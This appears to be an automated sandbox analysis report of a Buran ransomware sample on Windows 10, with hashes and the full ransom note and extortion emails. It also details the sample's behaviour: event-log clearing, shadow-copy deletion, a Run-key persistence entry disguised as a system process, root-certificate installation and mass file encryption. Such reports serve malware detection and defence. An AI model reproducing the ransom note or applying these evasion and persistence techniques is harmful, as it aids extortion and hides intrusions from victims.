buran | 13f476ec8dba856b93c2b799dbf9994191d14e9dbc2c6d75c9ec3d8054144b3f

Analysis

max time kernel
151s
max time network
134s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
03-06-2022 02:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

36c3-malwarexchg-part3/1.exe
Size

477KB
MD5

a1b5dc4fd2cd2b54498faf42fe9b5e50
SHA1

46edeab30fe0696422edad230116c51d5b145aa3
SHA256

533e14cb3a1434f68321fb9fd2a2e66d0a12ce16f792ee47e77edf8eb2aeac21
SHA512

6316f72a06960def5f9f086b4a258adf8dad7396524597fa23f2b781b87418b1009b5b8f7a67e90406739e2bdf3db873254ace84b64c6b569bda8c0435821848

Score

10^/10

buran evasion persistence ransomware

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note

!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email: stopcrypt@cock.email and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email: stopcrypt@cock.email Reserved email: decryptor@cock.email Your personal ID: 4C2-345-092 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Emails

stopcrypt@cock.email

decryptor@cock.email

Signatures

Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
ransomware buran
Clears Windows event logs 1 TTPs 3 IoCs
evasion ransomware

Indicator Removal on Host
T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exe

pid process

1472 wevtutil.exe
2008 wevtutil.exe
2596 wevtutil.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Executes dropped EXE 2 IoCs

Processes:

StartMenuExperienceHost.exeStartMenuExperienceHost.exe

pid process

4240 StartMenuExperienceHost.exe
3896 StartMenuExperienceHost.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

1.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation 1.exe

pid	process
1472	wevtutil.exe
2008	wevtutil.exe
2596	wevtutil.exe

pid	process
4240	StartMenuExperienceHost.exe
3896	StartMenuExperienceHost.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	1.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

1.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Windows\CurrentVersion\Run	1.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\StartMenuExperienceHost.exe\" -start"	1.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

StartMenuExperienceHost.exe

description	ioc	process
File opened (read-only)	\??\Z:	StartMenuExperienceHost.exe
File opened (read-only)	\??\X:	StartMenuExperienceHost.exe
File opened (read-only)	\??\V:	StartMenuExperienceHost.exe
File opened (read-only)	\??\T:	StartMenuExperienceHost.exe
File opened (read-only)	\??\R:	StartMenuExperienceHost.exe
File opened (read-only)	\??\Q:	StartMenuExperienceHost.exe
File opened (read-only)	\??\O:	StartMenuExperienceHost.exe
File opened (read-only)	\??\I:	StartMenuExperienceHost.exe
File opened (read-only)	\??\B:	StartMenuExperienceHost.exe
File opened (read-only)	\??\A:	StartMenuExperienceHost.exe
File opened (read-only)	\??\Y:	StartMenuExperienceHost.exe
File opened (read-only)	\??\G:	StartMenuExperienceHost.exe
File opened (read-only)	\??\E:	StartMenuExperienceHost.exe
File opened (read-only)	\??\W:	StartMenuExperienceHost.exe
File opened (read-only)	\??\S:	StartMenuExperienceHost.exe
File opened (read-only)	\??\P:	StartMenuExperienceHost.exe
File opened (read-only)	\??\N:	StartMenuExperienceHost.exe
File opened (read-only)	\??\M:	StartMenuExperienceHost.exe
File opened (read-only)	\??\J:	StartMenuExperienceHost.exe
File opened (read-only)	\??\F:	StartMenuExperienceHost.exe
File opened (read-only)	\??\U:	StartMenuExperienceHost.exe
File opened (read-only)	\??\L:	StartMenuExperienceHost.exe
File opened (read-only)	\??\K:	StartMenuExperienceHost.exe
File opened (read-only)	\??\H:	StartMenuExperienceHost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

7 geoiptool.com

flow	ioc
7	geoiptool.com

Drops file in Program Files directory 64 IoCs

Processes:

StartMenuExperienceHost.exe

description	ioc	process
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_scale-125.png	StartMenuExperienceHost.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\PlatformCapabilities\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_zh_4.4.0.v20140623020002.jar	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusMSDNR_Retail-ppd.xrm-ms	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-40_altform-unplated_contrast-black.png	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.properties.4C2-345-092	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_targetsize-256.png	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\am-ET\View3d\3DViewerProductDescription-universal.xml	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\nb-NO\View3d\3DViewerProductDescription-universal.xml	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SplashScreen.scale-400_contrast-black.png	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluNoInternetConnection_120x80.svg	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-templates.xml	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-uihandler.xml	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp2-ul-oob.xrm-ms.4C2-345-092	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\resources\strings\LocalizedStrings_lv.json	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-256_altform-colorize.png	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-32_altform-lightunplated.png	StartMenuExperienceHost.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine_2.3.0.v20140506-1720.jar	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019XC2RVL_KMS_ClientC2R-ul-oob.xrm-ms	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.scale-100.png.4C2-345-092	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNewNoteSmallTile.scale-100.png	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\iadata\BlockPair.bin	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA.4C2-345-092	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-charts.xml	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_Trial-pl.xrm-ms.4C2-345-092	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-125_kzf8qxf38zg5c\Assets\Images\SkypeLogo.scale-125.png	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-36_altform-lightunplated.png	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\delete.svg	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\ui-strings.js.4C2-345-092	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.ja_5.5.0.165303.jar.4C2-345-092	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Trial-ppd.xrm-ms	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-72.png	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxBlockMap.xml	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\7-Zip\7z.exe	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-64.png	StartMenuExperienceHost.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\191.png	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\W2.png	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-40_altform-unplated_contrast-white.png	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\MedTile.scale-200.png	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_checkbox_selected_18.svg	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt_3.103.1.v20140903-1938.jar	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\vlc.mo	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSplashLogo.scale-100.png	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\locale\updater_ja.jar.4C2-345-092	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ARCTIC\PREVIEW.GIF.4C2-345-092	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\MixedRealityPortalStoreLogo.scale-200.png	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteMediumTile.scale-125.png	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSectionMedTile.scale-200.png	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubSplashWideTile.scale-100_contrast-black.png	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.scale-180.png	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\Microsoft.Support.SDK.winmd	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-60_altform-unplated_contrast-white.png	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_MAK_AE-pl.xrm-ms.4C2-345-092	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019XC2RVL_KMS_ClientC2R-ppd.xrm-ms.4C2-345-092	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\manifest.xml	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-60_altform-unplated_contrast-white.png	StartMenuExperienceHost.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-ae\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Trial2-ppd.xrm-ms	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Trial2-pl.xrm-ms	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.targetsize-32.png	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es\ui-strings.js	StartMenuExperienceHost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\exportpdf-rna-tool-view.js.4C2-345-092	StartMenuExperienceHost.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

3060 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
3060	sc.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

1.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	1.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	1.exe

Runs net.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

1.exe

pid process

312 1.exe
312 1.exe

pid	process
312	1.exe
312	1.exe

Suspicious use of AdjustPrivilegeToken 54 IoCs

Processes:

1.exeStartMenuExperienceHost.exeWMIC.exevssvc.exewevtutil.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeDebugPrivilege	312	1.exe
Token: SeDebugPrivilege	312	1.exe
Token: SeDebugPrivilege	4240	StartMenuExperienceHost.exe
Token: SeIncreaseQuotaPrivilege	4156	WMIC.exe
Token: SeSecurityPrivilege	4156	WMIC.exe
Token: SeTakeOwnershipPrivilege	4156	WMIC.exe
Token: SeLoadDriverPrivilege	4156	WMIC.exe
Token: SeSystemProfilePrivilege	4156	WMIC.exe
Token: SeSystemtimePrivilege	4156	WMIC.exe
Token: SeProfSingleProcessPrivilege	4156	WMIC.exe
Token: SeIncBasePriorityPrivilege	4156	WMIC.exe
Token: SeCreatePagefilePrivilege	4156	WMIC.exe
Token: SeBackupPrivilege	4156	WMIC.exe
Token: SeRestorePrivilege	4156	WMIC.exe
Token: SeShutdownPrivilege	4156	WMIC.exe
Token: SeDebugPrivilege	4156	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4156	WMIC.exe
Token: SeRemoteShutdownPrivilege	4156	WMIC.exe
Token: SeUndockPrivilege	4156	WMIC.exe
Token: SeManageVolumePrivilege	4156	WMIC.exe
Token: 33	4156	WMIC.exe
Token: 34	4156	WMIC.exe
Token: 35	4156	WMIC.exe
Token: 36	4156	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4156	WMIC.exe
Token: SeSecurityPrivilege	4156	WMIC.exe
Token: SeTakeOwnershipPrivilege	4156	WMIC.exe
Token: SeLoadDriverPrivilege	4156	WMIC.exe
Token: SeSystemProfilePrivilege	4156	WMIC.exe
Token: SeSystemtimePrivilege	4156	WMIC.exe
Token: SeProfSingleProcessPrivilege	4156	WMIC.exe
Token: SeIncBasePriorityPrivilege	4156	WMIC.exe
Token: SeCreatePagefilePrivilege	4156	WMIC.exe
Token: SeBackupPrivilege	4156	WMIC.exe
Token: SeRestorePrivilege	4156	WMIC.exe
Token: SeShutdownPrivilege	4156	WMIC.exe
Token: SeDebugPrivilege	4156	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4156	WMIC.exe
Token: SeRemoteShutdownPrivilege	4156	WMIC.exe
Token: SeUndockPrivilege	4156	WMIC.exe
Token: SeManageVolumePrivilege	4156	WMIC.exe
Token: 33	4156	WMIC.exe
Token: 34	4156	WMIC.exe
Token: 35	4156	WMIC.exe
Token: 36	4156	WMIC.exe
Token: SeBackupPrivilege	5032	vssvc.exe
Token: SeRestorePrivilege	5032	vssvc.exe
Token: SeAuditPrivilege	5032	vssvc.exe
Token: SeSecurityPrivilege	2008	wevtutil.exe
Token: SeBackupPrivilege	2008	wevtutil.exe
Token: SeSecurityPrivilege	2596	wevtutil.exe
Token: SeBackupPrivilege	2596	wevtutil.exe
Token: SeSecurityPrivilege	1472	wevtutil.exe
Token: SeBackupPrivilege	1472	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1.exeStartMenuExperienceHost.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exe

description	pid	process	target process
PID 312 wrote to memory of 4240	312	1.exe	StartMenuExperienceHost.exe
PID 312 wrote to memory of 4240	312	1.exe	StartMenuExperienceHost.exe
PID 312 wrote to memory of 4240	312	1.exe	StartMenuExperienceHost.exe
PID 312 wrote to memory of 1920	312	1.exe	notepad.exe
PID 312 wrote to memory of 1920	312	1.exe	notepad.exe
PID 312 wrote to memory of 1920	312	1.exe	notepad.exe
PID 312 wrote to memory of 1920	312	1.exe	notepad.exe
PID 312 wrote to memory of 1920	312	1.exe	notepad.exe
PID 312 wrote to memory of 1920	312	1.exe	notepad.exe
PID 4240 wrote to memory of 3896	4240	StartMenuExperienceHost.exe	StartMenuExperienceHost.exe
PID 4240 wrote to memory of 3896	4240	StartMenuExperienceHost.exe	StartMenuExperienceHost.exe
PID 4240 wrote to memory of 3896	4240	StartMenuExperienceHost.exe	StartMenuExperienceHost.exe
PID 4240 wrote to memory of 540	4240	StartMenuExperienceHost.exe	cmd.exe
PID 4240 wrote to memory of 540	4240	StartMenuExperienceHost.exe	cmd.exe
PID 4240 wrote to memory of 540	4240	StartMenuExperienceHost.exe	cmd.exe
PID 540 wrote to memory of 2176	540	cmd.exe	net.exe
PID 540 wrote to memory of 2176	540	cmd.exe	net.exe
PID 540 wrote to memory of 2176	540	cmd.exe	net.exe
PID 2176 wrote to memory of 4716	2176	net.exe	net1.exe
PID 2176 wrote to memory of 4716	2176	net.exe	net1.exe
PID 2176 wrote to memory of 4716	2176	net.exe	net1.exe
PID 4240 wrote to memory of 1384	4240	StartMenuExperienceHost.exe	cmd.exe
PID 4240 wrote to memory of 1384	4240	StartMenuExperienceHost.exe	cmd.exe
PID 4240 wrote to memory of 1384	4240	StartMenuExperienceHost.exe	cmd.exe
PID 1384 wrote to memory of 4656	1384	cmd.exe	net.exe
PID 1384 wrote to memory of 4656	1384	cmd.exe	net.exe
PID 1384 wrote to memory of 4656	1384	cmd.exe	net.exe
PID 4656 wrote to memory of 4604	4656	net.exe	net1.exe
PID 4656 wrote to memory of 4604	4656	net.exe	net1.exe
PID 4656 wrote to memory of 4604	4656	net.exe	net1.exe
PID 4240 wrote to memory of 1432	4240	StartMenuExperienceHost.exe	cmd.exe
PID 4240 wrote to memory of 1432	4240	StartMenuExperienceHost.exe	cmd.exe
PID 4240 wrote to memory of 1432	4240	StartMenuExperienceHost.exe	cmd.exe
PID 1432 wrote to memory of 4348	1432	cmd.exe	net.exe
PID 1432 wrote to memory of 4348	1432	cmd.exe	net.exe
PID 1432 wrote to memory of 4348	1432	cmd.exe	net.exe
PID 4348 wrote to memory of 4992	4348	net.exe	net1.exe
PID 4348 wrote to memory of 4992	4348	net.exe	net1.exe
PID 4348 wrote to memory of 4992	4348	net.exe	net1.exe
PID 4240 wrote to memory of 868	4240	StartMenuExperienceHost.exe	cmd.exe
PID 4240 wrote to memory of 868	4240	StartMenuExperienceHost.exe	cmd.exe
PID 4240 wrote to memory of 868	4240	StartMenuExperienceHost.exe	cmd.exe
PID 868 wrote to memory of 760	868	cmd.exe	net.exe
PID 868 wrote to memory of 760	868	cmd.exe	net.exe
PID 868 wrote to memory of 760	868	cmd.exe	net.exe
PID 760 wrote to memory of 1124	760	net.exe	net1.exe
PID 760 wrote to memory of 1124	760	net.exe	net1.exe
PID 760 wrote to memory of 1124	760	net.exe	net1.exe
PID 4240 wrote to memory of 3540	4240	StartMenuExperienceHost.exe	cmd.exe
PID 4240 wrote to memory of 3540	4240	StartMenuExperienceHost.exe	cmd.exe
PID 4240 wrote to memory of 3540	4240	StartMenuExperienceHost.exe	cmd.exe
PID 3540 wrote to memory of 3344	3540	cmd.exe	net.exe
PID 3540 wrote to memory of 3344	3540	cmd.exe	net.exe
PID 3540 wrote to memory of 3344	3540	cmd.exe	net.exe
PID 3344 wrote to memory of 924	3344	net.exe	net1.exe
PID 3344 wrote to memory of 924	3344	net.exe	net1.exe
PID 3344 wrote to memory of 924	3344	net.exe	net1.exe
PID 4240 wrote to memory of 1020	4240	StartMenuExperienceHost.exe	cmd.exe
PID 4240 wrote to memory of 1020	4240	StartMenuExperienceHost.exe	cmd.exe
PID 4240 wrote to memory of 1020	4240	StartMenuExperienceHost.exe	cmd.exe
PID 1020 wrote to memory of 1524	1020	cmd.exe	net.exe
PID 1020 wrote to memory of 1524	1020	cmd.exe	net.exe
PID 1020 wrote to memory of 1524	1020	cmd.exe	net.exe
PID 1524 wrote to memory of 2216	1524	net.exe	net1.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1316 attrib.exe

pid	process
1316	attrib.exe

C:\Users\Admin\AppData\Local\Temp\36c3-malwarexchg-part3\1.exe
"C:\Users\Admin\AppData\Local\Temp\36c3-malwarexchg-part3\1.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:312

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\StartMenuExperienceHost.exe
